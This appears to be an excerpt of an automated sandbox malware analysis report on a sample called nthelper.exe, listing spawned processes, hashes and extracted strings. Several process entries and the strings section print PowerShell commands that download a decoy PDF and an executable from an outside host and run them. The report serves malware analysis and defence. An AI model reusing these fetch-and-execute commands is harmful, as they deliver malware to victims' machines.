                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:09:42:03
                                                          Start date:06/12/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\nthelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Local\Temp\nthelper.exe"
                                                          Imagebase:0x400000
                                                          File size:64'456 bytes
                                                          MD5 hash:1CEB5D0CB063290C1F66FCCFED96A220
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 8%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:09:42:03
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                          Imagebase:0x7ff6eb350000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:09:42:04
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:09:42:08
                                                          Start date:06/12/2024
                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
                                                          Imagebase:0x7ff688b00000
                                                          File size:5'641'176 bytes
                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:9
                                                          Start time:09:42:09
                                                          Start date:06/12/2024
                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                          Imagebase:0x7ff6e9af0000
                                                          File size:3'581'912 bytes
                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:10
                                                          Start time:09:42:09
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ff68dea0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:11
                                                          Start time:09:42:09
                                                          Start date:06/12/2024
                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1640,i,16748263348592557741,8757425967150341878,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                          Imagebase:0x7ff6e9af0000
                                                          File size:3'581'912 bytes
                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:18
                                                          Start time:09:42:31
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
                                                          Imagebase:0x7ff6eb350000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:19
                                                          Start time:09:42:31
                                                          Start date:06/12/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff68cce0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Reset < >
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1367412246.00007FFE7DE00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DE00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ffe7de00000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                            • Instruction ID: 13c77383cd58c274ecb887bb6b6a48fe338aedfb1f669825bbef80fa4d9d60cc
                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                            • Instruction Fuzzy Hash: 3901A73111CB0C4FD744EF0CE451AA5B3E0FB85320F10052EE58AC3661DA36E882CB41
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1555684676.00007FFE7DDD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DDD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffe7ddd0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                            • Instruction ID: 3fa855091d4645b6f54f512c9f000f331cb6d653f3326614ac405ed21cfbf121
                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                            • Instruction Fuzzy Hash: A401677111CB0D4FDB54EF0CE451AA6B7E0FB95364F10066EE58AC3661D736E882CB45
                                                            Strings
                                                            • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"), xrefs: 0040100B
                                                            • powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"), xrefs: 00401016
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2569094939.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2569001048.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000005.00000002.2569177519.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000005.00000002.2569266147.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_nthelper.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")$powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
                                                            • API String ID: 0-3628893888
                                                            • Opcode ID: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                            • Instruction ID: 1508df73bb81b20edbd2416e362e01711401bb553aa95eecbcdc2692af4642b4
                                                            • Opcode Fuzzy Hash: b02f0958cbd27640d2d698113142b38e593f06e20a30c2ca8041b629a764b5e1
                                                            • Instruction Fuzzy Hash: 6C312D31715B408EF7509B66E89038E36B4E788788F50427AEF5DE7BA9EF39C5408744
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2569094939.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2569001048.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000005.00000002.2569177519.0000000000402000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000005.00000002.2569266147.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_nthelper.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                            • Instruction ID: 37283cf5fd5ade48ec6d96cf6941fcaa95a322ea8f96897c16376f9f7fb2df5f
                                                            • Opcode Fuzzy Hash: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                            • Instruction Fuzzy Hash: 89F0FF61B006009EE700DBB5C4513DE3371A74478CF00057AEE0CB7B99DA38CA018794
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1651758978.00007FFE7DDE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DDE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffe7dde0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction ID: c404d9fde1452eeff25815ef1046dddb42ebff23ba9210f8deb1415e9eedbd87
                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction Fuzzy Hash: E501677111CB0D4FD754EF0CE451AB6B7E0FB99364F10066EE58AC3661D636E882CB45
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2738563946.00007FFE7DDE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DDE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ffe7dde0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction ID: c404d9fde1452eeff25815ef1046dddb42ebff23ba9210f8deb1415e9eedbd87
                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction Fuzzy Hash: E501677111CB0D4FD754EF0CE451AB6B7E0FB99364F10066EE58AC3661D636E882CB45